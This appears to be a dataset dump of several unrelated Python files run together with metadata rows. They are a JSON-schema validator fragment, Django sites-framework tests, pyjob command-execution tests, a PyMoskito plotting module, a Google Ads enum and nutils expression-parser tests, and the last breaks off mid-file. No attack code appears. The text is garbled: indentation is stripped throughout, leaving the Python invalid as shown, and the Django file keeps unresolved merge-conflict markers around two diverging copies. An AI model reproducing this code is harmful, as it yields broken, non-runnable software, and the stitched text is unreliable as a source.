logger.debug('use %s', substituted)
try:
return self.formats[substituted](obj)
except ValidationError as error:
logger.error(error)
self.fail('Forbidden value', obj, pointer)
return obj
def validate_items(self, obj, pointer=None):
if 'items' in self.attrs:
items = self.attrs['items']
if isinstance(items, Validator):
validator = items
for index, element in enumerate(obj):
with self.catch_fail():
obj[index] = validator(element, pointer_join(pointer, index)) # noqa
return obj
elif isinstance(items, (list, tuple)):
additionals = self.attrs['additional_items']
validators = items
validated = list(obj)
for index, element in enumerate(validated):
with self.catch_fail():
try:
validator = validators[index]
except IndexError:
if additionals is True:
return obj
elif additionals is False:
self.fail('Forbidden value',
obj,
pointer=pointer_join(self.uri, index)) # noqa
continue
validator = additionals
validated[index] = \
validator(element, pointer_join(pointer, index)) # noqa
obj = obj.__class__(validated)
return obj
else:
raise NotImplementedError(items)
return obj
def validate_maximum(self, obj, pointer=None):
if 'maximum' in self.attrs:
m = self.attrs['maximum']
if obj < m:
return obj
exclusive = self.attrs['exclusive_maximum']
if not exclusive and (obj == m):
return obj
self.fail('Exceeded maximum', obj, pointer)
return obj
def validate_max_items(self, obj, pointer=None):
if 'max_items' in self.attrs:
count = len(obj)
if count > self.attrs['max_items']:
self.fail('Too many elements', obj, pointer)
return obj
def validate_max_length(self, obj, pointer=None):
if 'max_length' in self.attrs:
length = len(obj)
if length > self.attrs['max_length']:
self.fail('Too long', obj, pointer)
return obj
def validate_max_properties(self, obj, pointer=None):
if 'max_properties' in self.attrs:
count = len(obj)
if count > self.attrs['max_properties']:
self.fail('Too many properties', obj, pointer)
return obj
def validate_minimum(self, obj, pointer=None):
if 'minimum' in self.attrs:
m = self.attrs['minimum']
if obj > m:
return obj
exclusive = self.attrs['exclusive_minimum']
if not exclusive and (obj == m):
return obj
self.fail('Too small', obj, pointer)
return obj
def validate_min_items(self, obj, pointer=None):
if 'min_items' in self.attrs:
count = len(obj)
if count < self.attrs['min_items']:
self.fail('Too few elements', obj, pointer)
return obj
def validate_min_length(self, obj, pointer=None):
if 'min_length' in self.attrs:
length = len(obj)
if length < self.attrs['min_length']:
self.fail('Too short', obj, pointer)
return obj
def validate_min_properties(self, obj, pointer=None):
if 'min_properties' in self.attrs:
count = len(obj)
if count < self.attrs['min_properties']:
self.fail('Too few properties', obj, pointer)
return obj
def validate_multiple_of(self, obj, pointer=None):
if 'multiple_of' in self.attrs:
factor = Decimal(str(self.attrs['multiple_of']))
orig = Decimal(str(obj))
if orig % factor != 0:
self.fail('Forbidden value', obj, pointer)
return obj
def validate_not(self, obj, pointer=None):
if 'not' in self.attrs:
try:
validator = self.attrs['not']
validator(obj)
except ValidationError:
return obj
else:
self.fail('Forbidden value', obj, pointer)
return obj
def validate_one_of(self, obj, pointer=None):
if 'one_of' in self.attrs:
validated = 0
for validator in self.attrs['one_of']:
try:
validated_obj = validator(obj)
validated += 1
except ValidationError:
pass
if not validated:
self.fail('Validates noone', obj)
elif validated == 1:
return validated_obj
else:
self.fail('Validates more than once', obj)
return obj
def validate_pattern(self, obj, pointer=None):
if 'pattern' in self.attrs:
pattern = self.attrs['pattern']
if re.search(pattern, obj):
return obj
self.fail('Forbidden value', obj, pointer)
return obj
def validate_properties(self, obj, pointer=None):
validated = set()
pending = set(obj.keys())
response = {}
if not obj:
return response
for name, validator in self.attrs['properties'].items():
if name in obj:
with self.catch_fail():
pending.discard(name)
obj[name] = validator(obj[name], pointer_join(pointer, name)) # noqa
validated.add(name)
for pattern, validator in self.attrs['pattern_properties'].items():
for name in sorted(obj.keys()):
if re.search(pattern, name):
with self.catch_fail():
pending.discard(name)
obj[name] = validator(obj[name], pointer_join(pointer, name)) # noqa
validated.add(name)
if not pending:
return obj
additionals = self.attrs['additional_properties']
if additionals is True:
return obj
if additionals is False:
for name in pending:
self.fail('Forbidden property', obj, pointer_join(pointer, name)) # noqa
return obj
validator = additionals
for name in sorted(pending):
obj[name] = validator(obj.pop(name), pointer_join(pointer, name)) # noqa
validated.add(name)
return obj
def validate_required(self, obj, pointer=None):
if 'required' in self.attrs:
for name in self.attrs['required']:
if name not in obj:
self.fail('Missing property', obj, pointer_join(pointer, name)) # noqa
return obj
def validate_type(self, obj, pointer=None):
if 'type' in self.attrs:
types = self.attrs['type']
if isinstance(types, string_types):
types = [types]
for t in types:
if t == 'array' and self.is_array(obj):
return obj
if t == 'boolean' and self.is_boolean(obj):
return obj
if t == 'integer' and self.is_integer(obj):
return obj
if t == 'number' and self.is_number(obj):
return obj
if t == 'null' and obj is None:
return obj
if t == 'object' and self.is_object(obj):
return obj
if t == 'string' and self.is_string(obj):
return obj
self.fail('Wrong type', obj, pointer)
return obj
def validate_unique_items(self, obj, pointer=None):
if self.attrs.get('unique_items'):
if len(obj) > len(set(json.dumps(element) for element in obj)):
self.fail('Elements must be unique', obj, pointer)
return obj
def is_optional(self):
"""
Returns True, beceause it is meaningless in draft04.
"""
logger.warn('asking for is_optional')
return True
def fail(self, reason, obj, pointer=None):
"""
Called when validation fails.
"""
pointer = pointer_join(pointer)
err = ValidationError(reason, obj, pointer)
if self.fail_fast:
raise err
else:
self.errors.append(err)
return err
def catch_fail(self):
return FailCatcher(self)
class FailCatcher(object):
def __init__(self, validator):
self.validator = validator
def __enter__(self):
return self
def __exit__(self, type, value, tb):
if isinstance(value, ValidationError) and not self.validator.fail_fast:
self.validator.errors.append(value)
return True
return False
| bsd-3-clause | -2,568,410,251,468,870,000 | 37.348018 | 115 | 0.562474 | false |
yephper/django | tests/sites_framework/tests.py | 1 | 5520 | <<<<<<< HEAD
from django.conf import settings
from django.contrib.sites.managers import CurrentSiteManager
from django.contrib.sites.models import Site
from django.core import checks
from django.db import models
from django.test import SimpleTestCase, TestCase
from django.test.utils import isolate_apps
from .models import CustomArticle, ExclusiveArticle, SyndicatedArticle
class SitesFrameworkTestCase(TestCase):
def setUp(self):
Site.objects.get_or_create(id=settings.SITE_ID, domain="example.com", name="example.com")
Site.objects.create(id=settings.SITE_ID + 1, domain="example2.com", name="example2.com")
def test_site_fk(self):
article = ExclusiveArticle.objects.create(title="Breaking News!", site_id=settings.SITE_ID)
self.assertEqual(ExclusiveArticle.on_site.all().get(), article)
def test_sites_m2m(self):
article = SyndicatedArticle.objects.create(title="Fresh News!")
article.sites.add(Site.objects.get(id=settings.SITE_ID))
article.sites.add(Site.objects.get(id=settings.SITE_ID + 1))
article2 = SyndicatedArticle.objects.create(title="More News!")
article2.sites.add(Site.objects.get(id=settings.SITE_ID + 1))
self.assertEqual(SyndicatedArticle.on_site.all().get(), article)
def test_custom_named_field(self):
article = CustomArticle.objects.create(
title="Tantalizing News!",
places_this_article_should_appear_id=settings.SITE_ID,
)
self.assertEqual(CustomArticle.on_site.all().get(), article)
@isolate_apps('sites_framework')
class CurrentSiteManagerChecksTests(SimpleTestCase):
def test_invalid_name(self):
class InvalidArticle(models.Model):
on_site = CurrentSiteManager("places_this_article_should_appear")
errors = InvalidArticle.check()
expected = [
checks.Error(
"CurrentSiteManager could not find a field named "
"'places_this_article_should_appear'.",
obj=InvalidArticle.on_site,
id='sites.E001',
)
]
self.assertEqual(errors, expected)
def test_invalid_field_type(self):
class ConfusedArticle(models.Model):
site = models.IntegerField()
on_site = CurrentSiteManager()
errors = ConfusedArticle.check()
expected = [
checks.Error(
"CurrentSiteManager cannot use 'ConfusedArticle.site' as it is "
"not a ForeignKey or ManyToManyField.",
obj=ConfusedArticle.on_site,
id='sites.E002',
)
]
self.assertEqual(errors, expected)
=======
from django.conf import settings
from django.contrib.sites.managers import CurrentSiteManager
from django.contrib.sites.models import Site
from django.core import checks
from django.db import models
from django.test import SimpleTestCase, TestCase
from django.test.utils import isolate_apps
from .models import CustomArticle, ExclusiveArticle, SyndicatedArticle
class SitesFrameworkTestCase(TestCase):
def setUp(self):
Site.objects.get_or_create(id=settings.SITE_ID, domain="example.com", name="example.com")
Site.objects.create(id=settings.SITE_ID + 1, domain="example2.com", name="example2.com")
def test_site_fk(self):
article = ExclusiveArticle.objects.create(title="Breaking News!", site_id=settings.SITE_ID)
self.assertEqual(ExclusiveArticle.on_site.all().get(), article)
def test_sites_m2m(self):
article = SyndicatedArticle.objects.create(title="Fresh News!")
article.sites.add(Site.objects.get(id=settings.SITE_ID))
article.sites.add(Site.objects.get(id=settings.SITE_ID + 1))
article2 = SyndicatedArticle.objects.create(title="More News!")
article2.sites.add(Site.objects.get(id=settings.SITE_ID + 1))
self.assertEqual(SyndicatedArticle.on_site.all().get(), article)
def test_custom_named_field(self):
article = CustomArticle.objects.create(
title="Tantalizing News!",
places_this_article_should_appear_id=settings.SITE_ID,
)
self.assertEqual(CustomArticle.on_site.all().get(), article)
@isolate_apps('sites_framework')
class CurrentSiteManagerChecksTests(SimpleTestCase):
def test_invalid_name(self):
class InvalidArticle(models.Model):
on_site = CurrentSiteManager("places_this_article_should_appear")
errors = InvalidArticle.check()
expected = [
checks.Error(
"CurrentSiteManager could not find a field named "
"'places_this_article_should_appear'.",
obj=InvalidArticle.on_site,
id='sites.E001',
)
]
self.assertEqual(errors, expected)
def test_invalid_field_type(self):
class ConfusedArticle(models.Model):
site = models.IntegerField()
on_site = CurrentSiteManager()
errors = ConfusedArticle.check()
expected = [
checks.Error(
"CurrentSiteManager cannot use 'ConfusedArticle.site' as it is "
"not a foreign key or a many-to-many field.",
obj=ConfusedArticle.on_site,
id='sites.E002',
)
]
self.assertEqual(errors, expected)
>>>>>>> 6448873197fa4e3df3f5f03201538dc57d7643d6
| bsd-3-clause | -6,722,924,623,333,033,000 | 37.111888 | 99 | 0.647283 | false |
fsimkovic/pyjob | pyjob/tests/test_cexec.py | 1 | 2326 | __author__ = 'Felix Simkovic'
import os
import pytest
import sys
from pyjob.cexec import cexec
from pyjob.exception import PyJobExecutableNotFoundError, PyJobExecutionError
class TestCexec(object):
def test_1(self):
stdout = cexec([sys.executable, '-c', 'import sys; print("hello"); sys.exit(0)'])
assert stdout == 'hello'
def test_2(self):
with pytest.raises(PyJobExecutionError):
cexec([sys.executable, '-c', 'import sys; sys.exit(1)'])
def test_3(self):
cmd = [sys.executable, '-c', 'import sys; print("hello"); sys.exit(1)']
stdout = cexec(cmd, permit_nonzero=True)
assert stdout == 'hello'
def test_4(self):
if sys.version_info < (3, 0):
cmd = [sys.executable, '-c', 'import sys; print(raw_input()); sys.exit(0)']
else:
cmd = [sys.executable, '-c', 'import sys; print(input()); sys.exit(0)']
stdout = cexec(cmd, stdin='hello')
assert stdout == 'hello'
def test_5(self):
cmd = [sys.executable, '-c', 'import os, sys; print(os.getcwd()); sys.exit(0)']
directory = os.path.join(os.getcwd())
stdout = cexec(cmd, cwd=directory)
assert stdout == directory
def test_6(self):
cmd = [sys.executable, '-c', 'import sys; print("hello"); sys.exit(0)']
fname = 'test.log'
with open(fname, 'w') as f:
stdout = cexec(cmd, stdout=f)
assert stdout is None
with open(fname, 'r') as f:
assert f.read().strip() == 'hello'
pytest.helpers.unlink([fname])
def test_7(self):
cmd = [sys.executable, '-c', 'import os, sys; print(os.getcwd()); sys.exit("error message")']
directory = os.path.join(os.getcwd())
with open('stdout.log', 'w') as fstdout, open('stderr.log', 'w') as fstderr:
stdout = cexec(cmd, stdout=fstdout, stderr=fstderr, permit_nonzero=True)
assert stdout is None
with open('stdout.log', 'r') as f:
assert f.read().strip() == directory
with open('stderr.log', 'r') as f:
assert f.read().strip() == 'error message'
pytest.helpers.unlink(['stdout.log', 'stderr.log'])
def test_8(self):
with pytest.raises(PyJobExecutableNotFoundError):
cexec(['fjezfsdkj'])
| mit | -6,436,261,199,304,623,000 | 35.920635 | 101 | 0.578246 | false |
cklb/PyMoskito | pymoskito/metaprocessing/eval_L1NormITAE_poles_linePlot.py | 1 | 3126 | # -*- coding: utf-8 -*-
from tools import getSubValue
# mpl.rcParams['text.usetex']=True
# mpl.rcParams['text.latex.unicode']=True
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from processing_gui import MetaProcessingModule
from tools import sortTree
from tools import getSubValue
class eval_L1NormITAE_poles_linePlot(MetaProcessingModule):
"""
create diagrams, which plot L1NormITAE over poles
"""
def __init__(self):
MetaProcessingModule.__init__(self)
return
def run(self, post_results):
# create tree with all relevant data
source = sortTree(post_results, ['modules', 'controller', 'type'])
# Get the Poles for the Minimum
for controller in source:
x_path = ['modules', 'controller', 'poles']
y_path = ['metrics', 'L1NormITAE']
x_list = getSubValue(source[controller], x_path)
y_list = getSubValue(source[controller], y_path)
x_list[:] = [x for x, y in zip(x_list, y_list) if y]
y_list[:] = [i for i in y_list if i]
self._logger.info("processing controller '{}'".format(controller))
self._logger.info("min ITAE {}".format(min(y_list)))
self._logger.info("opt poles {}".format(x_list[y_list.index(min(y_list))][0]))
# create plot
fig = Figure()
# fig.subplots_adjust(wspace=20, hspace=10, h_pad=50)
fig.subplots_adjust(wspace=0.6, hspace=0.6)
# plot for L1NormITAE over poles
axes = fig.add_subplot(111)
self.plotVariousController(source, axes,
xPath=['modules', 'controller', 'poles'],
yPath=['metrics', 'L1NormITAE'],
typ='line',
xIndex=0)
self.plotSettings(axes,
titel=r'Fehlerintegral ITAE \"uber Polplatzierung',
grid=True,
xlabel=r'$Poles \, \lbrack s\rbrack$',
ylabel=r'$E \, \lbrack ms^{2} \rbrack$',
)
# error minimum
for controllerName in source.keys():
error_list = getSubValue(source[controllerName], ['metrics', 'L1NormITAE'])
error_min = min(x for x in error_list if x is not None)
error_min_index = error_list.index(error_min)
poles = getSubValue(source[controllerName], ['modules', 'controller', 'poles'])[error_min_index][0]
self._logger.info("minimum error of {} for {} with poles at {}".format(error_min, controllerName, poles))
# extract controllerNames
controller_names = [x[:-len('Controller')] for x in source.keys()]
canvas = FigureCanvas(fig)
# write output files
file_name = self.name[len('eval_'):] \
+ '_Controller_(' + ''.join(controller_names) + ')'
self.writeOutputFiles(file_name, fig)
return [{'figure': canvas, 'name': self.name}]
| bsd-3-clause | 3,792,409,148,593,499,000 | 39.597403 | 117 | 0.564939 | false |
googleads/google-ads-python | google/ads/googleads/v6/enums/types/search_term_match_type.py | 1 | 1277 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v6.enums",
marshal="google.ads.googleads.v6",
manifest={"SearchTermMatchTypeEnum",},
)
class SearchTermMatchTypeEnum(proto.Message):
r"""Container for enum describing match types for a keyword
triggering an ad.
"""
class SearchTermMatchType(proto.Enum):
r"""Possible match types for a keyword triggering an ad,
including variants.
"""
UNSPECIFIED = 0
UNKNOWN = 1
BROAD = 2
EXACT = 3
PHRASE = 4
NEAR_EXACT = 5
NEAR_PHRASE = 6
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 571,851,014,140,160,960 | 26.76087 | 74 | 0.676586 | false |
wijnandhoitinga/nutils | tests/test_expression.py | 1 | 28965 | import nutils.expression
from nutils.testing import *
_ = lambda arg: (None, arg)
class Array:
def __init__(self, text, shape):
self.text = text
self.shape = tuple(shape)
self.ndim = len(self.shape)
def __len__(self):
return self.shape[0]
def __str__(self):
return self.text
def __repr__(self):
return self.text
def __eq__(self, other):
return type(self) == type(other) and self.text == other.text
def __hash__(self):
return hash(self.text)
class Variables:
def __init__(self, x, altgeom, funcoverride):
self.x = x
self.altgeom = altgeom
self.funcoverride = funcoverride
self._lengths = {str(i): i for i in range(10)}
def __getitem__(self, name):
if not name.startswith('_'):
try:
return getattr(self, name)
except AttributeError:
pass
raise KeyError(name)
def __contains__(self, name):
try:
self[name]
return True
except KeyError:
return False
def __getattr__(self, name):
if name.startswith('_'):
return _(getattr(self, name[1:]))
elif name.startswith('a'):
return Array(name, tuple(self._lengths.get(i, nutils.expression._Length(ord(i))) for i in name[1:]))
else:
raise AttributeError(name)
def get(self, name, default):
try:
return self[name]
except KeyError:
return default
v = Variables(x=Array('x', [2]), altgeom=Array('altgeom', [3]), funcoverride=Array('funcoverride', []))
functions = dict(func1=1, func2=2, func3=3, funcoverride=1)
class parse(TestCase):
def assert_ast(self, expression, indices, ast, variables=None, **parse_kwargs):
if variables is None:
variables = v
self.assertEqual(nutils.expression.parse(expression, variables, functions, indices, **parse_kwargs)[0], ast)
def assert_syntax_error(self, msg, expression, indices, highlight, arg_shapes={}, fixed_lengths=None, exccls=nutils.expression.ExpressionSyntaxError):
with self.assertRaises(exccls) as cm:
nutils.expression.parse(expression, v, functions, indices, arg_shapes, fixed_lengths=fixed_lengths)
self.assertEqual(str(cm.exception), msg + '\n' + expression + '\n' + highlight)
# OTHER
def test_no_indices_0(self): self.assert_ast('a', None, v._a)
def test_no_indices_1(self): self.assert_ast('a2_i', None, v._a2)
def test_ambiguous_alignment(self):
self.assert_syntax_error(
"Cannot unambiguously align the array because the array has more than one dimension.",
"a23_ij", None,
"^^^^^^",
exccls=nutils.expression.AmbiguousAlignmentError)
def test_mul_2(self):
self.assert_ast('a2_i a3_j', 'ij',
('mul',
('append_axis', v._a2, _(3)),
('transpose',
('append_axis', v._a3, _(2)),
_((1,0)))))
def test_mul_add_sub(self):
self.assert_ast('1_j a2_i + 1_i a3_j - a23_ij', 'ij',
('transpose',
('sub',
('add',
('mul',
('append_axis', ('append_axis', _(1), _(3)), _(2)),
('transpose', ('append_axis', v._a2, _(3)), _((1,0)))),
('transpose',
('mul',
('append_axis', ('append_axis', _(1), _(2)), _(3)),
('transpose', ('append_axis', v._a3, _(2)), _((1,0)))),
_((1,0)))),
('transpose', v._a23, _((1,0)))),
_((1,0))))
def test_mul_reduce_2(self):
self.assert_ast('a2_i a23_ij a3_j', '',
('sum',
('mul',
('sum',
('mul',
('append_axis', v._a2, _(3)),
v._a23),
_(0)),
v._a3),
_(0)))
def test_dupl_indices_1(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"a3_j a2_i,ii a2_k", "i",
" ^^^^^^^")
def test_missing_indices_1(self):
self.assert_syntax_error(
"Expected 1 index, got 2.",
"a2_i a3_ij a2_j", "",
" ^^^^^")
def test_missing_indices_2(self):
self.assert_syntax_error(
"Expected 2 indices, got 0.",
"a2_i a23 a2_j", "ij",
" ^^^")
def test_wrap_array_trace(self): self.assert_ast('a222_ijj', 'i', ('trace', v._a222, _(1), _(2)))
def test_div_const_scalar(self): self.assert_ast('a2_i / 1', 'i', ('truediv', v._a2, _(1)))
def test_div_scalar_variable(self): self.assert_ast('a2_i / a', 'i', ('truediv', v._a2, v._a))
def test_div_scalar_sum(self): self.assert_ast('a2_i / 2 a3_j a3_j', 'i', ('truediv', v._a2, ('sum', ('mul', ('mul', ('append_axis', _(2), _(3)), v._a3), v._a3), _(0))))
def test_array_denominator(self):
self.assert_syntax_error(
"A denominator must have dimension 0.",
"a2_i / a3_j", "ij",
" ^^^^")
def test_duplicate_indices_numerator_denominator(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"1 + a2_i a2_i / a3_i a3_i", "",
" ^^^^^^^^^^^^^^^^^^^^^")
def test_duplicate_indices_2(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"a2_i (a3_i a23_ji)", "ij",
"^^^^^^^^^^^^^^^^^^")
def test_duplicate_indices_3(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"a2_i (a3_i a23_ji)", "ij",
"^^^^^^^^^^^^^^^^^^")
def test_duplicate_indices_4(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"a222_iii", "",
"^^^^^^^^")
def test_leading_zeros_int(self):
self.assert_syntax_error(
"Leading zeros are forbidden.",
"1 + 01", "",
" ^^")
def test_leading_zeros_float(self):
self.assert_syntax_error(
"Leading zeros are forbidden.",
"1 + 01.0", "",
" ^^^^")
def test_missing_indices_3(self):
self.assert_syntax_error(
"Missing indices.",
"a22_ij + a2_", "ij",
" ^")
def test_missing_gradient_indices_1(self):
self.assert_syntax_error(
"Missing indices.",
"a22_ij + a2_,", "ij",
" ^")
def test_missing_whitespace_add_right(self):
self.assert_syntax_error(
"Missing whitespace.",
"a2_i +a2_i", "i",
" ^")
def test_missing_whitespace_add_left(self):
self.assert_syntax_error(
"Missing whitespace.",
"a2_i+ a2_i", "i",
" ^")
def test_missing_whitespace_sub_right(self):
self.assert_syntax_error(
"Missing whitespace.",
"a2_i -a2_i", "i",
" ^")
def test_missing_whitespace_sub_left(self):
self.assert_syntax_error(
"Missing whitespace.",
"a2_i- a2_i", "i",
" ^")
def test_int(self):
self.assert_ast('1', '', _(1))
def test_float(self):
for f in '10', '1', '1.', '.1', '1.2', '0.01', '10.0':
self.assert_ast(f, '', _(float(f)))
def test_scientific(self):
for base in '0', '1', '10', '1.', '.1', '.01', '1.2':
for exp in '-1', '0', '1', '10':
self.assert_ast(base+'e'+exp, '', _(float(base+'e'+exp)))
def test_jump_mean(self):
self.assert_ast('[a2_i,i] + {a2_j,j}', '',
('add',
('jump', ('trace', ('grad', v._a2, v._x), _(0), _(1))),
('mean', ('trace', ('grad', v._a2, v._x), _(0), _(1)))))
def test_jump_normal(self): self.assert_ast('[a]_i', 'i', ('mul', ('append_axis', ('jump', v._a), _(2)), ('normal', v._x)))
def test_jump_normal_altgeom(self): self.assert_ast('[a]_altgeom_i', 'i', ('mul', ('append_axis', ('jump', v._a), _(3)), ('normal', v._altgeom)))
def test_laplace_of_group(self):
self.assert_ast('(2 a2_i)_,jj', 'i',
('trace',
('grad',
('grad',
('group',
('mul',
('append_axis', _(2), _(2)),
v._a2)),
v._x),
v._x),
_(1), _(2)))
def test_indices_on_group(self):
self.assert_syntax_error(
"Indices can only be specified for variables, e.g. 'a_ij', not for groups, e.g. '(a+b)_ij'.",
"1 + (a2_i)_j + 1", "ij",
" ^")
def test_unknown_symbol(self):
self.assert_syntax_error(
"Unknown symbol: '#'.",
"1 + # + 1", "",
" ^")
def test_invalid_group_end_partial_expression(self):
self.assert_syntax_error(
"Expected a variable, group or function call.",
"1 + (2 + )", "",
" ^")
def test_invalid_group_end_wrong_bracket_no_whitespace(self):
self.assert_syntax_error(
"Expected ')'.",
"1 + (2 + 3] + 4", "",
" ^")
def test_invalid_group_end_wrong_bracket_whitespace(self):
self.assert_syntax_error(
"Expected ')'.",
"1 + (2 + 3 ] + 4", "",
" ^")
def test_invalid_group_end_eof(self):
self.assert_syntax_error(
"Expected ')'.",
"1 + (2 + 3", "",
" ^")
def test_expected_EOF(self):
self.assert_syntax_error(
"Unexpected symbol at end of expression.",
"1 ) 1", "",
" ^")
def test_shape_mismatch(self):
self.assert_syntax_error(
"Shapes at index 'i' differ: 2, 4.",
"1_j + a234_iji + 1_j", "j",
" ^^^^^^^^")
def test_unknown_variable(self):
self.assert_syntax_error(
"Unknown variable: 'b'.",
"1 + b + 1", "",
" ^")
def test_const_numeric_indices(self):
self.assert_syntax_error(
"Numeric indices are not allowed on constant values.",
"1 + 1_i0 + 1", "",
" ^^^^")
def test_const_repeated_indices(self):
self.assert_syntax_error(
"Indices of a constant value may not be repeated.",
"1 + 1_ii + 1", "",
" ^^^^")
def test_const_index_pos(self):
self.assert_syntax_error(
"Length of axis cannot be determined from the expression.",
"1_i", "i",
" ^")
# NEG
def test_neg_no_whitspace(self): self.assert_ast('-a2_i', 'i', ('neg', v._a2))
def test_neg_whitespace(self): self.assert_ast('- a2_i', 'i', ('neg', v._a2))
def test_neg_in_group(self): self.assert_ast('(- a2_i)', 'i', ('group', ('neg', v._a2)))
# ADD SUB
def test_add_sub_unmatched_indices(self):
self.assert_syntax_error(
"Cannot add arrays with unmatched indices: 'i', 'j'.",
"a22_ij + (a2_i + a2_j + a2_ij)", "ij",
" ^^^^^^^^^^^")
# POW
def test_array_pow_pos(self): self.assert_ast('a2_i^2', 'i', ('pow', v._a2, _(2)))
def test_array_pow_neg(self): self.assert_ast('a2_i^-2', 'i', ('pow', v._a2, ('neg', _(2))))
def test_array_pow_scientific(self): self.assert_ast('a2_i^1e1', 'i', ('pow', v._a2, _(1e1)))
def test_array_pow_scalar_expr(self): self.assert_ast('a2_i^(1 / 3)', 'i', ('pow', v._a2, ('truediv', _(1), _(3))))
def test_scalar_pow_pos(self): self.assert_ast('2^3', '', ('pow', _(2), _(3)))
def test_scalar_pow_neg(self): self.assert_ast('2^-3', '', ('pow', _(2), ('neg', _(3))))
def test_scalar_pow_scalar_expr(self): self.assert_ast('2^(1 / 3)', '', ('pow', _(2), ('truediv', _(1), _(3))))
def test_array_pow_nonconst(self):
self.assert_syntax_error(
"Expected a number.",
"a2_i + a2_i^a + a2_i", "i",
" ^")
def test_array_pow_vector_expr(self):
self.assert_syntax_error(
"An exponent must have dimension 0.",
"1_i + a2_i^(a2_j) + 1_i", "ij",
" ^^^^^^^^^^^")
def test_array_pow_repeated_indices(self):
self.assert_syntax_error(
"Index 'i' occurs more than twice.",
"1_i + a2_i^(a22_ii) + 1_i", "i",
" ^^^^^^^^^^^^^")
# NUMERIC INDEX
def test_numeric_index(self): self.assert_ast('a23_i0', 'i', ('getitem', v._a23, _(1), _(0)))
def test_numeric_index_grad(self): self.assert_ast('a2_i,1', 'i', ('getitem', ('grad', v._a2, v._x), _(1), _(1)))
def test_numeric_index_out_of_range(self):
self.assert_syntax_error(
"Index of dimension 1 with length 4 out of range.",
"1 + a343_i4i + 1", "",
" ^^^^^^^^")
def test_numeric_index_out_of_range_grad(self):
self.assert_syntax_error(
"Index of dimension 0 with length 2 out of range.",
"1 + a2_1,2 + 1", "",
" ^^^^^^")
# EYE
def test_single_eye(self):
for eye in 'δ$':
with self.subTest(eye=eye):
self.assert_ast('a2_i {}_ij'.format(eye), 'j', ('sum', ('mul', ('append_axis', v._a2, _(2)), ('eye', _(2))), _(0)))
def test_multiple_eye(self): self.assert_ast('δ_ij δ_jk a2_i a2_k', '',
('sum',
('mul',
('sum',
('mul',
('sum',
('mul',
('append_axis', ('eye', _(2)), _(2)),
('transpose', ('append_axis', ('eye', _(2)), _(2)), _((2,0,1)))),
_(1)),
('append_axis', v._a2, _(2))),
_(0)),
v._a2),
_(0)))
def test_eye_missing_indices(self):
self.assert_syntax_error(
"Expected 2 indices, got 0.",
"1 + δ + 1", "",
" ^")
def test_eye_invalid_number_of_indices(self):
self.assert_syntax_error(
"Expected 2 indices, got 3.",
"1 + δ_ijk + 1", "",
" ^^^^^")
def test_eye_same_index(self):
self.assert_syntax_error(
"Length of axis cannot be determined from the expression.",
"1 + δ_ii + 1", "",
" ^")
def test_eye_shape_mismatch(self):
self.assert_syntax_error(
"Shapes at index 'k' differ: 2, 3.",
"1 + δ_ij δ_jk a2_i a3_k + 1", "",
" ^^^^^^^^^^^^^^^^^^^")
def test_variable_startswith_eye(self):
b = Array('b', [2,2])
δx = Array('δx', [2,2])
self.assert_ast('b_ij + δx_ij', 'ij', ('add', _(b), _(δx)), variables=dict(b=b, δx=δx))
def test_variable_startswith_dollar_eye(self):
self.assert_syntax_error(
"Expected 2 indices, got 0.",
"a22_ij + $x_ij", "ij",
" ^")
# GRAD
def test_gradient_default(self): self.assert_ast('a2_i,j', 'ij', ('grad', v._a2, v._x))
def test_gradient_other_default(self): self.assert_ast('a2_i,j', 'ij', ('grad', v._a2, v._altgeom), default_geometry_name='altgeom')
def test_gradient_default_trace(self): self.assert_ast('a2_i,i', '', ('trace', ('grad', v._a2, v._x), _(0), _(1)))
def test_gradient_default_double_trace(self): self.assert_ast('a422_ijk,jk', 'i', ('trace', ('grad', ('trace', ('grad', v._a422, v._x), _(1), _(3)), v._x), _(1), _(2)))
def test_gradient_altgeom(self): self.assert_ast('a3_i,altgeom_j', 'ij', ('grad', v._a3, v._altgeom))
def test_gradient_altgeom_trace(self): self.assert_ast('a3_i,altgeom_i', '', ('trace', ('grad', v._a3, v._altgeom), _(0), _(1)))
def test_gradient_altgeom_double_trace(self): self.assert_ast('a433_ijk,altgeom_jk', 'i', ('trace', ('grad', ('trace', ('grad', v._a433, v._altgeom), _(1), _(3)), v._altgeom), _(1), _(2)))
def test_surfgrad_default(self): self.assert_ast('a2_i;j', 'ij', ('surfgrad', v._a2, v._x))
def test_surfgrad_default_trace(self): self.assert_ast('a2_i;i', '', ('trace', ('surfgrad', v._a2, v._x), _(0), _(1)))
def test_gradient_invalid_geom_0dim(self):
self.assert_syntax_error(
"Invalid geometry: expected 1 dimension, but 'a' has 0.",
"1 + a2_i,a_i + 1", "",
" ^^^^^^^^")
def test_gradient_invalid_geom_2dim(self):
self.assert_syntax_error(
"Invalid geometry: expected 1 dimension, but 'a22' has 2.",
"1 + a2_i,a22_i + 1", "",
" ^^^^^^^^^^")
def test_gradient_const_scalar(self):
self.assert_syntax_error(
"Taking a derivative of a constant is not allowed.",
"1_i + 1_,i + 1_i", "i",
" ^^^^")
def test_gradient_const_array(self):
self.assert_syntax_error(
"Taking a derivative of a constant is not allowed.",
"1 + 1_i,i + 1", "",
" ^^^^^")
# NEW GRAD
def test_newgradient(self): self.assert_ast('dx_j:a2_i', 'ij', ('grad', v._a2, v._x))
def test_newgradient_trace(self): self.assert_ast('dx_i:a2_i', '', ('trace', ('grad', v._a2, v._x), _(0), _(1)))
def test_newgradient_double_trace(self): self.assert_ast('dx_k:(dx_j:a422_ijk)', 'i', ('trace', ('grad', ('group', ('trace', ('grad', v._a422, v._x), _(1), _(3))), v._x), _(1), _(2)))
# DERIVATIVE
